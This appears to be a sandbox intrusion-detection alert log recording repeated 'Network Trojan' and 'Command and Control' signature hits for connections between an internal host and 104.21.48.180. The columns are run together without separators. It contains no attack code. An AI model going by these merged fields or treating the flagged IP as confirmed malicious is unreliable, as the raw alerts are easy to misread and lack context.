            2025-02-20T16:17:22.425939+010020254831A Network Trojan was detected104.21.48.180192.168.2.550042TCP
            2025-02-20T16:17:24.215858+010020254831A Network Trojan was detected104.21.48.180192.168.2.550044TCP
            2025-02-20T16:17:25.033744+010020254831A Network Trojan was detected104.21.48.180192.168.2.550045TCP
            2025-02-20T16:17:26.947989+010020254831A Network Trojan was detected104.21.48.180192.168.2.550047TCP
            2025-02-20T16:17:28.026548+010020254831A Network Trojan was detected104.21.48.180192.168.2.550048TCP
            2025-02-20T16:17:28.869578+010020254831A Network Trojan was detected104.21.48.180192.168.2.550049TCP
            2025-02-20T16:17:29.847238+010020254831A Network Trojan was detected104.21.48.180192.168.2.550050TCP
            2025-02-20T16:17:30.749987+010020254831A Network Trojan was detected104.21.48.180192.168.2.550051TCP
            2025-02-20T16:17:33.778332+010020254831A Network Trojan was detected104.21.48.180192.168.2.550054TCP
            2025-02-20T16:17:34.773980+010020254831A Network Trojan was detected104.21.48.180192.168.2.550055TCP
            2025-02-20T16:17:35.575911+010020254831A Network Trojan was detected104.21.48.180192.168.2.550056TCP
            2025-02-20T16:17:36.552241+010020254831A Network Trojan was detected104.21.48.180192.168.2.550057TCP
            2025-02-20T16:17:37.524642+010020254831A Network Trojan was detected104.21.48.180192.168.2.550058TCP
            2025-02-20T16:17:38.451084+010020254831A Network Trojan was detected104.21.48.180192.168.2.550059TCP
            2025-02-20T16:17:39.305972+010020254831A Network Trojan was detected104.21.48.180192.168.2.550060TCP
            2025-02-20T16:17:40.428475+010020254831A Network Trojan was detected104.21.48.180192.168.2.550061TCP
            2025-02-20T16:17:41.400197+010020254831A Network Trojan was detected104.21.48.180192.168.2.550062TCP
            2025-02-20T16:17:42.349465+010020254831A Network Trojan was detected104.21.48.180192.168.2.550063TCP
            2025-02-20T16:17:43.288988+010020254831A Network Trojan was detected104.21.48.180192.168.2.550064TCP
            2025-02-20T16:17:44.092797+010020254831A Network Trojan was detected104.21.48.180192.168.2.550065TCP
            2025-02-20T16:17:45.075563+010020254831A Network Trojan was detected104.21.48.180192.168.2.550066TCP
            2025-02-20T16:17:46.963109+010020254831A Network Trojan was detected104.21.48.180192.168.2.550068TCP
            2025-02-20T16:17:47.745133+010020254831A Network Trojan was detected104.21.48.180192.168.2.550069TCP
            2025-02-20T16:17:48.743169+010020254831A Network Trojan was detected104.21.48.180192.168.2.550070TCP
            2025-02-20T16:17:50.618967+010020254831A Network Trojan was detected104.21.48.180192.168.2.550072TCP
            2025-02-20T16:17:51.445141+010020254831A Network Trojan was detected104.21.48.180192.168.2.550073TCP
            2025-02-20T16:17:52.429279+010020254831A Network Trojan was detected104.21.48.180192.168.2.550074TCP
            2025-02-20T16:17:53.415943+010020254831A Network Trojan was detected104.21.48.180192.168.2.550075TCP
            2025-02-20T16:17:54.389729+010020254831A Network Trojan was detected104.21.48.180192.168.2.550076TCP
            2025-02-20T16:17:55.227156+010020254831A Network Trojan was detected104.21.48.180192.168.2.550077TCP
            2025-02-20T16:17:56.178269+010020254831A Network Trojan was detected104.21.48.180192.168.2.550078TCP
            2025-02-20T16:17:56.996003+010020254831A Network Trojan was detected104.21.48.180192.168.2.550079TCP
            2025-02-20T16:17:57.955787+010020254831A Network Trojan was detected104.21.48.180192.168.2.550080TCP
            2025-02-20T16:17:58.797121+010020254831A Network Trojan was detected104.21.48.180192.168.2.550081TCP
            2025-02-20T16:17:59.774869+010020254831A Network Trojan was detected104.21.48.180192.168.2.550082TCP
            2025-02-20T16:18:00.590127+010020254831A Network Trojan was detected104.21.48.180192.168.2.550083TCP
            2025-02-20T16:18:01.679001+010020254831A Network Trojan was detected104.21.48.180192.168.2.550084TCP
            2025-02-20T16:18:02.532491+010020254831A Network Trojan was detected104.21.48.180192.168.2.550085TCP
            2025-02-20T16:18:03.382311+010020254831A Network Trojan was detected104.21.48.180192.168.2.550086TCP
            2025-02-20T16:18:04.341330+010020254831A Network Trojan was detected104.21.48.180192.168.2.550087TCP
            2025-02-20T16:18:06.262599+010020254831A Network Trojan was detected104.21.48.180192.168.2.550089TCP
            2025-02-20T16:18:07.228544+010020254831A Network Trojan was detected104.21.48.180192.168.2.550090TCP
            2025-02-20T16:18:08.176844+010020254831A Network Trojan was detected104.21.48.180192.168.2.550091TCP
            2025-02-20T16:18:09.103134+010020254831A Network Trojan was detected104.21.48.180192.168.2.550092TCP
            2025-02-20T16:18:09.937919+010020254831A Network Trojan was detected104.21.48.180192.168.2.550093TCP
            2025-02-20T16:18:10.748831+010020254831A Network Trojan was detected104.21.48.180192.168.2.550094TCP
            2025-02-20T16:18:11.815809+010020254831A Network Trojan was detected104.21.48.180192.168.2.550095TCP
            2025-02-20T16:18:12.618998+010020254831A Network Trojan was detected104.21.48.180192.168.2.550096TCP
            2025-02-20T16:18:15.272721+010020254831A Network Trojan was detected104.21.48.180192.168.2.550099TCP
            2025-02-20T16:18:16.209823+010020254831A Network Trojan was detected104.21.48.180192.168.2.550100TCP
            2025-02-20T16:18:17.160218+010020254831A Network Trojan was detected104.21.48.180192.168.2.550101TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-20T16:16:19.177352+010020243131Malware Command and Control Activity Detected192.168.2.549706104.21.48.180TCP
            2025-02-20T16:16:20.171562+010020243131Malware Command and Control Activity Detected192.168.2.549707104.21.48.180TCP
            2025-02-20T16:16:21.163109+010020243131Malware Command and Control Activity Detected192.168.2.549708104.21.48.180TCP
            2025-02-20T16:16:22.133438+010020243131Malware Command and Control Activity Detected192.168.2.549709104.21.48.180TCP
            2025-02-20T16:16:23.036473+010020243131Malware Command and Control Activity Detected192.168.2.549710104.21.48.180TCP
            2025-02-20T16:16:23.971117+010020243131Malware Command and Control Activity Detected192.168.2.549711104.21.48.180TCP
            2025-02-20T16:16:24.882922+010020243131Malware Command and Control Activity Detected192.168.2.549712104.21.48.180TCP
            2025-02-20T16:16:25.823481+010020243131Malware Command and Control Activity Detected192.168.2.549713104.21.48.180TCP
            2025-02-20T16:16:26.809908+010020243131Malware Command and Control Activity Detected192.168.2.549714104.21.48.180TCP
            2025-02-20T16:16:27.787542+010020243131Malware Command and Control Activity Detected192.168.2.549715104.21.48.180TCP
            2025-02-20T16:16:28.816412+010020243131Malware Command and Control Activity Detected192.168.2.549716104.21.48.180TCP
            2025-02-20T16:16:29.787907+010020243131Malware Command and Control Activity Detected192.168.2.549717104.21.48.180TCP
            2025-02-20T16:16:30.715606+010020243131Malware Command and Control Activity Detected192.168.2.549720104.21.48.180TCP
            2025-02-20T16:16:31.713901+010020243131Malware Command and Control Activity Detected192.168.2.549722104.21.48.180TCP
            2025-02-20T16:16:32.623728+010020243131Malware Command and Control Activity Detected192.168.2.549733104.21.48.180TCP
            2025-02-20T16:16:33.588298+010020243131Malware Command and Control Activity Detected192.168.2.549741104.21.48.180TCP
            2025-02-20T16:16:34.514783+010020243131Malware Command and Control Activity Detected192.168.2.549747104.21.48.180TCP
            2025-02-20T16:16:35.456566+010020243131Malware Command and Control Activity Detected192.168.2.549753104.21.48.180TCP
            2025-02-20T16:16:36.386720+010020243131Malware Command and Control Activity Detected192.168.2.549759104.21.48.180TCP
            2025-02-20T16:16:37.321105+010020243131Malware Command and Control Activity Detected192.168.2.549764104.21.48.180TCP
            2025-02-20T16:16:38.234217+010020243131Malware Command and Control Activity Detected192.168.2.549771104.21.48.180TCP
            2025-02-20T16:16:39.175015+010020243131Malware Command and Control Activity Detected192.168.2.549777104.21.48.180TCP
            2025-02-20T16:16:39.981665+010020243131Malware Command and Control Activity Detected192.168.2.549784104.21.48.180TCP
            2025-02-20T16:16:40.750572+010020243131Malware Command and Control Activity Detected192.168.2.549790104.21.48.180TCP
            2025-02-20T16:16:41.634702+010020243131Malware Command and Control Activity Detected192.168.2.549796104.21.48.180TCP
            2025-02-20T16:16:42.456542+010020243131Malware Command and Control Activity Detected192.168.2.549802104.21.48.180TCP
            2025-02-20T16:16:43.342275+010020243131Malware Command and Control Activity Detected192.168.2.549808104.21.48.180TCP
            2025-02-20T16:16:44.161594+010020243131Malware Command and Control Activity Detected192.168.2.549816104.21.48.180TCP
            2025-02-20T16:16:45.111969+010020243131Malware Command and Control Activity Detected192.168.2.549823104.21.48.180TCP
            2025-02-20T16:16:45.899639+010020243131Malware Command and Control Activity Detected192.168.2.549829104.21.48.180TCP
            2025-02-20T16:16:46.867512+010020243131Malware Command and Control Activity Detected192.168.2.549835104.21.48.180TCP
            2025-02-20T16:16:47.881796+010020243131Malware Command and Control Activity Detected192.168.2.549840104.21.48.180TCP
            2025-02-20T16:16:48.821573+010020243131Malware Command and Control Activity Detected192.168.2.549848104.21.48.180TCP
            2025-02-20T16:16:49.901047+010020243131Malware Command and Control Activity Detected192.168.2.549856104.21.48.180TCP
            2025-02-20T16:16:50.829122+010020243131Malware Command and Control Activity Detected192.168.2.549863104.21.48.180TCP
            2025-02-20T16:16:51.613601+010020243131Malware Command and Control Activity Detected192.168.2.549869104.21.48.180TCP
            2025-02-20T16:16:52.535331+010020243131Malware Command and Control Activity Detected192.168.2.549875104.21.48.180TCP
            2025-02-20T16:16:54.424082+010020243131Malware Command and Control Activity Detected192.168.2.549884104.21.48.180TCP
            2025-02-20T16:16:55.283690+010020243131Malware Command and Control Activity Detected192.168.2.549896104.21.48.180TCP
            2025-02-20T16:16:56.213457+010020243131Malware Command and Control Activity Detected192.168.2.549902104.21.48.180TCP
            2025-02-20T16:16:57.156001+010020243131Malware Command and Control Activity Detected192.168.2.549909104.21.48.180TCP
            2025-02-20T16:16:58.381726+010020243131Malware Command and Control Activity Detected192.168.2.549919104.21.48.180TCP
            2025-02-20T16:16:59.199663+010020243131Malware Command and Control Activity Detected192.168.2.549925104.21.48.180TCP
            2025-02-20T16:17:00.166443+010020243131Malware Command and Control Activity Detected192.168.2.549932104.21.48.180TCP
            2025-02-20T16:17:01.361596+010020243131Malware Command and Control Activity Detected192.168.2.549940104.21.48.180TCP
            2025-02-20T16:17:02.525094+010020243131Malware Command and Control Activity Detected192.168.2.549948104.21.48.180TCP
            2025-02-20T16:17:03.405067+010020243131Malware Command and Control Activity Detected192.168.2.549956104.21.48.180TCP
            2025-02-20T16:17:04.241603+010020243131Malware Command and Control Activity Detected192.168.2.549962104.21.48.180TCP
            2025-02-20T16:17:05.198591+010020243131Malware Command and Control Activity Detected192.168.2.549969104.21.48.180TCP
            2025-02-20T16:17:06.163154+010020243131Malware Command and Control Activity Detected192.168.2.549975104.21.48.180TCP
            2025-02-20T16:17:07.094201+010020243131Malware Command and Control Activity Detected192.168.2.549983104.21.48.180TCP
            2025-02-20T16:17:08.072232+010020243131Malware Command and Control Activity Detected192.168.2.549990104.21.48.180TCP
            2025-02-20T16:17:08.997264+010020243131Malware Command and Control Activity Detected192.168.2.549998104.21.48.180TCP
            2025-02-20T16:17:09.958886+010020243131Malware Command and Control Activity Detected192.168.2.550005104.21.48.180TCP
            2025-02-20T16:17:10.955731+010020243131Malware Command and Control Activity Detected192.168.2.550011104.21.48.180TCP
            2025-02-20T16:17:11.760362+010020243131Malware Command and Control Activity Detected192.168.2.550020104.21.48.180TCP
            2025-02-20T16:17:12.716591+010020243131Malware Command and Control Activity Detected192.168.2.550025104.21.48.180TCP
            2025-02-20T16:17:13.686142+010020243131Malware Command and Control Activity Detected192.168.2.550032104.21.48.180TCP
            2025-02-20T16:17:14.617433+010020243131Malware Command and Control Activity Detected192.168.2.550034104.21.48.180TCP
            2025-02-20T16:17:15.895206+010020243131Malware Command and Control Activity Detected192.168.2.550035104.21.48.180TCP
            2025-02-20T16:17:16.858040+010020243131Malware Command and Control Activity Detected192.168.2.550036104.21.48.180TCP
            2025-02-20T16:17:17.652291+010020243131Malware Command and Control Activity Detected192.168.2.550037104.21.48.180TCP
            2025-02-20T16:17:18.508355+010020243131Malware Command and Control Activity Detected192.168.2.550038104.21.48.180TCP
            2025-02-20T16:17:19.354313+010020243131Malware Command and Control Activity Detected192.168.2.550039104.21.48.180TCP
            2025-02-20T16:17:20.200400+010020243131Malware Command and Control Activity Detected192.168.2.550040104.21.48.180TCP
            2025-02-20T16:17:21.485259+010020243131Malware Command and Control Activity Detected192.168.2.550041104.21.48.180TCP
            2025-02-20T16:17:22.420852+010020243131Malware Command and Control Activity Detected192.168.2.550042104.21.48.180TCP
            2025-02-20T16:17:23.377790+010020243131Malware Command and Control Activity Detected192.168.2.550043104.21.48.180TCP
            2025-02-20T16:17:24.208115+010020243131Malware Command and Control Activity Detected192.168.2.550044104.21.48.180TCP
            2025-02-20T16:17:25.027736+010020243131Malware Command and Control Activity Detected192.168.2.550045104.21.48.180TCP
            2025-02-20T16:17:25.974095+010020243131Malware Command and Control Activity Detected192.168.2.550046104.21.48.180TCP
            2025-02-20T16:17:26.942992+010020243131Malware Command and Control Activity Detected192.168.2.550047104.21.48.180TCP
            2025-02-20T16:17:28.019859+010020243131Malware Command and Control Activity Detected192.168.2.550048104.21.48.180TCP
            2025-02-20T16:17:28.864525+010020243131Malware Command and Control Activity Detected192.168.2.550049104.21.48.180TCP
            2025-02-20T16:17:29.842211+010020243131Malware Command and Control Activity Detected192.168.2.550050104.21.48.180TCP
            2025-02-20T16:17:30.745012+010020243131Malware Command and Control Activity Detected192.168.2.550051104.21.48.180TCP
            2025-02-20T16:17:31.660052+010020243131Malware Command and Control Activity Detected192.168.2.550052104.21.48.180TCP
            2025-02-20T16:17:32.778567+010020243131Malware Command and Control Activity Detected192.168.2.550053104.21.48.180TCP
            2025-02-20T16:17:33.773219+010020243131Malware Command and Control Activity Detected192.168.2.550054104.21.48.180TCP
            2025-02-20T16:17:34.768951+010020243131Malware Command and Control Activity Detected192.168.2.550055104.21.48.180TCP
            2025-02-20T16:17:35.570863+010020243131Malware Command and Control Activity Detected192.168.2.550056104.21.48.180TCP
            2025-02-20T16:17:36.546997+010020243131Malware Command and Control Activity Detected192.168.2.550057104.21.48.180TCP
            2025-02-20T16:17:37.519267+010020243131Malware Command and Control Activity Detected192.168.2.550058104.21.48.180TCP
            2025-02-20T16:17:38.446103+010020243131Malware Command and Control Activity Detected192.168.2.550059104.21.48.180TCP
            2025-02-20T16:17:39.299101+010020243131Malware Command and Control Activity Detected192.168.2.550060104.21.48.180TCP
            2025-02-20T16:17:40.423414+010020243131Malware Command and Control Activity Detected192.168.2.550061104.21.48.180TCP
            2025-02-20T16:17:41.395216+010020243131Malware Command and Control Activity Detected192.168.2.550062104.21.48.180TCP
            2025-02-20T16:17:42.343321+010020243131Malware Command and Control Activity Detected192.168.2.550063104.21.48.180TCP
            2025-02-20T16:17:43.283158+010020243131Malware Command and Control Activity Detected192.168.2.550064104.21.48.180TCP
            2025-02-20T16:17:44.087718+010020243131Malware Command and Control Activity Detected192.168.2.550065104.21.48.180TCP
            2025-02-20T16:17:45.070504+010020243131Malware Command and Control Activity Detected192.168.2.550066104.21.48.180TCP
            2025-02-20T16:17:45.966563+010020243131Malware Command and Control Activity Detected192.168.2.550067104.21.48.180TCP
            2025-02-20T16:17:46.958013+010020243131Malware Command and Control Activity Detected192.168.2.550068104.21.48.180TCP
            2025-02-20T16:17:47.740003+010020243131Malware Command and Control Activity Detected192.168.2.550069104.21.48.180TCP
            2025-02-20T16:17:48.738143+010020243131Malware Command and Control Activity Detected192.168.2.550070104.21.48.180TCP
            2025-02-20T16:17:49.634747+010020243131Malware Command and Control Activity Detected192.168.2.550071104.21.48.180TCP
            2025-02-20T16:17:50.613880+010020243131Malware Command and Control Activity Detected192.168.2.550072104.21.48.180TCP
            2025-02-20T16:17:51.439592+010020243131Malware Command and Control Activity Detected192.168.2.550073104.21.48.180TCP
            2025-02-20T16:17:52.424115+010020243131Malware Command and Control Activity Detected192.168.2.550074104.21.48.180TCP
            2025-02-20T16:17:53.410139+010020243131Malware Command and Control Activity Detected192.168.2.550075104.21.48.180TCP
            2025-02-20T16:17:54.384273+010020243131Malware Command and Control Activity Detected192.168.2.550076104.21.48.180TCP
            2025-02-20T16:17:55.222106+010020243131Malware Command and Control Activity Detected192.168.2.550077104.21.48.180TCP
            2025-02-20T16:17:56.170636+010020243131Malware Command and Control Activity Detected192.168.2.550078104.21.48.180TCP
            2025-02-20T16:17:56.990527+010020243131Malware Command and Control Activity Detected192.168.2.550079104.21.48.180TCP
            2025-02-20T16:17:57.950763+010020243131Malware Command and Control Activity Detected192.168.2.550080104.21.48.180TCP
            2025-02-20T16:17:58.792069+010020243131Malware Command and Control Activity Detected192.168.2.550081104.21.48.180TCP
            2025-02-20T16:17:59.769874+010020243131Malware Command and Control Activity Detected192.168.2.550082104.21.48.180TCP
            2025-02-20T16:18:00.585095+010020243131Malware Command and Control Activity Detected192.168.2.550083104.21.48.180TCP
            2025-02-20T16:18:01.673948+010020243131Malware Command and Control Activity Detected192.168.2.550084104.21.48.180TCP
            2025-02-20T16:18:02.527456+010020243131Malware Command and Control Activity Detected192.168.2.550085104.21.48.180TCP
            2025-02-20T16:18:03.377232+010020243131Malware Command and Control Activity Detected192.168.2.550086104.21.48.180TCP
            2025-02-20T16:18:04.336245+010020243131Malware Command and Control Activity Detected192.168.2.550087104.21.48.180TCP
            2025-02-20T16:18:05.259144+010020243131Malware Command and Control Activity Detected192.168.2.550088104.21.48.180TCP
            2025-02-20T16:18:06.257394+010020243131Malware Command and Control Activity Detected192.168.2.550089104.21.48.180TCP
            2025-02-20T16:18:07.223528+010020243131Malware Command and Control Activity Detected192.168.2.550090104.21.48.180TCP
            2025-02-20T16:18:08.171789+010020243131Malware Command and Control Activity Detected192.168.2.550091104.21.48.180TCP
            2025-02-20T16:18:09.097978+010020243131Malware Command and Control Activity Detected192.168.2.550092104.21.48.180TCP
            2025-02-20T16:18:09.928723+010020243131Malware Command and Control Activity Detected192.168.2.550093104.21.48.180TCP
            2025-02-20T16:18:10.738427+010020243131Malware Command and Control Activity Detected192.168.2.550094104.21.48.180TCP
            2025-02-20T16:18:11.810822+010020243131Malware Command and Control Activity Detected192.168.2.550095104.21.48.180TCP
            2025-02-20T16:18:12.613983+010020243131Malware Command and Control Activity Detected192.168.2.550096104.21.48.180TCP
            2025-02-20T16:18:13.515960+010020243131Malware Command and Control Activity Detected192.168.2.550097104.21.48.180TCP
            2025-02-20T16:18:14.433231+010020243131Malware Command and Control Activity Detected192.168.2.550098104.21.48.180TCP
            2025-02-20T16:18:15.267674+010020243131Malware Command and Control Activity Detected192.168.2.550099104.21.48.180TCP
            2025-02-20T16:18:16.204766+010020243131Malware Command and Control Activity Detected192.168.2.550100104.21.48.180TCP
            2025-02-20T16:18:17.154296+010020243131Malware Command and Control Activity Detected192.168.2.550101104.21.48.180TCP
            2025-02-20T16:18:18.095583+010020243131Malware Command and Control Activity Detected192.168.2.550102104.21.48.180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-20T16:16:19.177352+010020243181Malware Command and Control Activity Detected192.168.2.549706104.21.48.180TCP
            2025-02-20T16:16:20.171562+010020243181Malware Command and Control Activity Detected192.168.2.549707104.21.48.180TCP
            2025-02-20T16:16:21.163109+010020243181Malware Command and Control Activity Detected192.168.2.549708104.21.48.180TCP
            2025-02-20T16:16:22.133438+010020243181Malware Command and Control Activity Detected192.168.2.549709104.21.48.180TCP
            2025-02-20T16:16:23.036473+010020243181Malware Command and Control Activity Detected192.168.2.549710104.21.48.180TCP
            2025-02-20T16:16:23.971117+010020243181Malware Command and Control Activity Detected192.168.2.549711104.21.48.180TCP
            2025-02-20T16:16:24.882922+010020243181Malware Command and Control Activity Detected192.168.2.549712104.21.48.180TCP
            2025-02-20T16:16:25.823481+010020243181Malware Command and Control Activity Detected192.168.2.549713104.21.48.180TCP
            2025-02-20T16:16:26.809908+010020243181Malware Command and Control Activity Detected192.168.2.549714104.21.48.180TCP
            2025-02-20T16:16:27.787542+010020243181Malware Command and Control Activity Detected192.168.2.549715104.21.48.180TCP
            2025-02-20T16:16:28.816412+010020243181Malware Command and Control Activity Detected192.168.2.549716104.21.48.180TCP
            2025-02-20T16:16:29.787907+010020243181Malware Command and Control Activity Detected192.168.2.549717104.21.48.180TCP
            2025-02-20T16:16:30.715606+010020243181Malware Command and Control Activity Detected192.168.2.549720104.21.48.180TCP
            2025-02-20T16:16:31.713901+010020243181Malware Command and Control Activity Detected192.168.2.549722104.21.48.180TCP
            2025-02-20T16:16:32.623728+010020243181Malware Command and Control Activity Detected192.168.2.549733104.21.48.180TCP
            2025-02-20T16:16:33.588298+010020243181Malware Command and Control Activity Detected192.168.2.549741104.21.48.180TCP
            2025-02-20T16:16:34.514783+010020243181Malware Command and Control Activity Detected192.168.2.549747104.21.48.180TCP
            2025-02-20T16:16:35.456566+010020243181Malware Command and Control Activity Detected192.168.2.549753104.21.48.180TCP
            2025-02-20T16:16:36.386720+010020243181Malware Command and Control Activity Detected192.168.2.549759104.21.48.180TCP
            2025-02-20T16:16:37.321105+010020243181Malware Command and Control Activity Detected192.168.2.549764104.21.48.180TCP
            2025-02-20T16:16:38.234217+010020243181Malware Command and Control Activity Detected192.168.2.549771104.21.48.180TCP
            2025-02-20T16:16:39.175015+010020243181Malware Command and Control Activity Detected192.168.2.549777104.21.48.180TCP
            2025-02-20T16:16:39.981665+010020243181Malware Command and Control Activity Detected192.168.2.549784104.21.48.180TCP
            2025-02-20T16:16:40.750572+010020243181Malware Command and Control Activity Detected192.168.2.549790104.21.48.180TCP
            2025-02-20T16:16:41.634702+010020243181Malware Command and Control Activity Detected192.168.2.549796104.21.48.180TCP
            2025-02-20T16:16:42.456542+010020243181Malware Command and Control Activity Detected192.168.2.549802104.21.48.180TCP
            2025-02-20T16:16:43.342275+010020243181Malware Command and Control Activity Detected192.168.2.549808104.21.48.180TCP
            2025-02-20T16:16:44.161594+010020243181Malware Command and Control Activity Detected192.168.2.549816104.21.48.180TCP
            2025-02-20T16:16:45.111969+010020243181Malware Command and Control Activity Detected192.168.2.549823104.21.48.180TCP
            2025-02-20T16:16:45.899639+010020243181Malware Command and Control Activity Detected192.168.2.549829104.21.48.180TCP
            2025-02-20T16:16:46.867512+010020243181Malware Command and Control Activity Detected192.168.2.549835104.21.48.180TCP
            2025-02-20T16:16:47.881796+010020243181Malware Command and Control Activity Detected192.168.2.549840104.21.48.180TCP
            2025-02-20T16:16:48.821573+010020243181Malware Command and Control Activity Detected192.168.2.549848104.21.48.180TCP
            2025-02-20T16:16:49.901047+010020243181Malware Command and Control Activity Detected192.168.2.549856104.21.48.180TCP
            2025-02-20T16:16:50.829122+010020243181Malware Command and Control Activity Detected192.168.2.549863104.21.48.180TCP
            2025-02-20T16:16:51.613601+010020243181Malware Command and Control Activity Detected192.168.2.549869104.21.48.180TCP
            2025-02-20T16:16:52.535331+010020243181Malware Command and Control Activity Detected192.168.2.549875104.21.48.180TCP
            2025-02-20T16:16:54.424082+010020243181Malware Command and Control Activity Detected192.168.2.549884104.21.48.180TCP
            2025-02-20T16:16:55.283690+010020243181Malware Command and Control Activity Detected192.168.2.549896104.21.48.180TCP
            2025-02-20T16:16:56.213457+010020243181Malware Command and Control Activity Detected192.168.2.549902104.21.48.180TCP
            2025-02-20T16:16:57.156001+010020243181Malware Command and Control Activity Detected192.168.2.549909104.21.48.180TCP
            2025-02-20T16:16:58.381726+010020243181Malware Command and Control Activity Detected192.168.2.549919104.21.48.180TCP
            2025-02-20T16:16:59.199663+010020243181Malware Command and Control Activity Detected192.168.2.549925104.21.48.180TCP
            2025-02-20T16:17:00.166443+010020243181Malware Command and Control Activity Detected192.168.2.549932104.21.48.180TCP
            2025-02-20T16:17:01.361596+010020243181Malware Command and Control Activity Detected192.168.2.549940104.21.48.180TCP
            2025-02-20T16:17:02.525094+010020243181Malware Command and Control Activity Detected192.168.2.549948104.21.48.180TCP
            2025-02-20T16:17:03.405067+010020243181Malware Command and Control Activity Detected192.168.2.549956104.21.48.180TCP
            2025-02-20T16:17:04.241603+010020243181Malware Command and Control Activity Detected192.168.2.549962104.21.48.180TCP
            2025-02-20T16:17:05.198591+010020243181Malware Command and Control Activity Detected192.168.2.549969104.21.48.180TCP
            2025-02-20T16:17:06.163154+010020243181Malware Command and Control Activity Detected192.168.2.549975104.21.48.180TCP
            2025-02-20T16:17:07.094201+010020243181Malware Command and Control Activity Detected192.168.2.549983104.21.48.180TCP
            2025-02-20T16:17:08.072232+010020243181Malware Command and Control Activity Detected192.168.2.549990104.21.48.180TCP
            2025-02-20T16:17:08.997264+010020243181Malware Command and Control Activity Detected192.168.2.549998104.21.48.180TCP
            2025-02-20T16:17:09.958886+010020243181Malware Command and Control Activity Detected192.168.2.550005104.21.48.180TCP
            2025-02-20T16:17:10.955731+010020243181Malware Command and Control Activity Detected192.168.2.550011104.21.48.180TCP
            2025-02-20T16:17:11.760362+010020243181Malware Command and Control Activity Detected192.168.2.550020104.21.48.180TCP
            2025-02-20T16:17:12.716591+010020243181Malware Command and Control Activity Detected192.168.2.550025104.21.48.180TCP
            2025-02-20T16:17:13.686142+010020243181Malware Command and Control Activity Detected192.168.2.550032104.21.48.180TCP
            2025-02-20T16:17:14.617433+010020243181Malware Command and Control Activity Detected192.168.2.550034104.21.48.180TCP
            2025-02-20T16:17:15.895206+010020243181Malware Command and Control Activity Detected192.168.2.550035104.21.48.180TCP
            2025-02-20T16:17:16.858040+010020243181Malware Command and Control Activity Detected192.168.2.550036104.21.48.180TCP
            2025-02-20T16:17:17.652291+010020243181Malware Command and Control Activity Detected192.168.2.550037104.21.48.180TCP
            2025-02-20T16:17:18.508355+010020243181Malware Command and Control Activity Detected192.168.2.550038104.21.48.180TCP
            2025-02-20T16:17:19.354313+010020243181Malware Command and Control Activity Detected192.168.2.550039104.21.48.180TCP
            2025-02-20T16:17:20.200400+010020243181Malware Command and Control Activity Detected192.168.2.550040104.21.48.180TCP
            2025-02-20T16:17:21.485259+010020243181Malware Command and Control Activity Detected192.168.2.550041104.21.48.180TCP
            2025-02-20T16:17:22.420852+010020243181Malware Command and Control Activity Detected192.168.2.550042104.21.48.180TCP
            2025-02-20T16:17:23.377790+010020243181Malware Command and Control Activity Detected192.168.2.550043104.21.48.180TCP
            2025-02-20T16:17:24.208115+010020243181Malware Command and Control Activity Detected192.168.2.550044104.21.48.180TCP
            2025-02-20T16:17:25.027736+010020243181Malware Command and Control Activity Detected192.168.2.550045104.21.48.180TCP
            2025-02-20T16:17:25.974095+010020243181Malware Command and Control Activity Detected192.168.2.550046104.21.48.180TCP
            2025-02-20T16:17:26.942992+010020243181Malware Command and Control Activity Detected192.168.2.550047104.21.48.180TCP
            2025-02-20T16:17:28.019859+010020243181Malware Command and Control Activity Detected192.168.2.550048104.21.48.180TCP
            2025-02-20T16:17:28.864525+010020243181Malware Command and Control Activity Detected192.168.2.550049104.21.48.180TCP
            2025-02-20T16:17:29.842211+010020243181Malware Command and Control Activity Detected192.168.2.550050104.21.48.180TCP
            2025-02-20T16:17:30.745012+010020243181Malware Command and Control Activity Detected192.168.2.550051104.21.48.180TCP
            2025-02-20T16:17:31.660052+010020243181Malware Command and Control Activity Detected192.168.2.550052104.21.48.180TCP
            2025-02-20T16:17:32.778567+010020243181Malware Command and Control Activity Detected192.168.2.550053104.21.48.180TCP
            2025-02-20T16:17:33.773219+010020243181Malware Command and Control Activity Detected192.168.2.550054104.21.48.180TCP
            2025-02-20T16:17:34.768951+010020243181Malware Command and Control Activity Detected192.168.2.550055104.21.48.180TCP
            2025-02-20T16:17:35.570863+010020243181Malware Command and Control Activity Detected192.168.2.550056104.21.48.180TCP
            2025-02-20T16:17:36.546997+010020243181Malware Command and Control Activity Detected192.168.2.550057104.21.48.180TCP
            2025-02-20T16:17:37.519267+010020243181Malware Command and Control Activity Detected192.168.2.550058104.21.48.180TCP
            2025-02-20T16:17:38.446103+010020243181Malware Command and Control Activity Detected192.168.2.550059104.21.48.180TCP
            2025-02-20T16:17:39.299101+010020243181Malware Command and Control Activity Detected192.168.2.550060104.21.48.180TCP
            2025-02-20T16:17:40.423414+010020243181Malware Command and Control Activity Detected192.168.2.550061104.21.48.180TCP
            2025-02-20T16:17:41.395216+010020243181Malware Command and Control Activity Detected192.168.2.550062104.21.48.180TCP
            2025-02-20T16:17:42.343321+010020243181Malware Command and Control Activity Detected192.168.2.550063104.21.48.180TCP
            2025-02-20T16:17:43.283158+010020243181Malware Command and Control Activity Detected192.168.2.550064104.21.48.180TCP
            2025-02-20T16:17:44.087718+010020243181Malware Command and Control Activity Detected192.168.2.550065104.21.48.180TCP
            2025-02-20T16:17:45.070504+010020243181Malware Command and Control Activity Detected192.168.2.550066104.21.48.180TCP
            2025-02-20T16:17:45.966563+010020243181Malware Command and Control Activity Detected192.168.2.550067104.21.48.180TCP
            2025-02-20T16:17:46.958013+010020243181Malware Command and Control Activity Detected192.168.2.550068104.21.48.180TCP
            2025-02-20T16:17:47.740003+010020243181Malware Command and Control Activity Detected192.168.2.550069104.21.48.180TCP
            2025-02-20T16:17:48.738143+010020243181Malware Command and Control Activity Detected192.168.2.550070104.21.48.180TCP
            2025-02-20T16:17:49.634747+010020243181Malware Command and Control Activity Detected192.168.2.550071104.21.48.180TCP
            2025-02-20T16:17:50.613880+010020243181Malware Command and Control Activity Detected192.168.2.550072104.21.48.180TCP
            2025-02-20T16:17:51.439592+010020243181Malware Command and Control Activity Detected192.168.2.550073104.21.48.180TCP
            2025-02-20T16:17:52.424115+010020243181Malware Command and Control Activity Detected192.168.2.550074104.21.48.180TCP
            2025-02-20T16:17:53.410139+010020243181Malware Command and Control Activity Detected192.168.2.550075104.21.48.180TCP
            2025-02-20T16:17:54.384273+010020243181Malware Command and Control Activity Detected192.168.2.550076104.21.48.180TCP
            2025-02-20T16:17:55.222106+010020243181Malware Command and Control Activity Detected192.168.2.550077104.21.48.180TCP
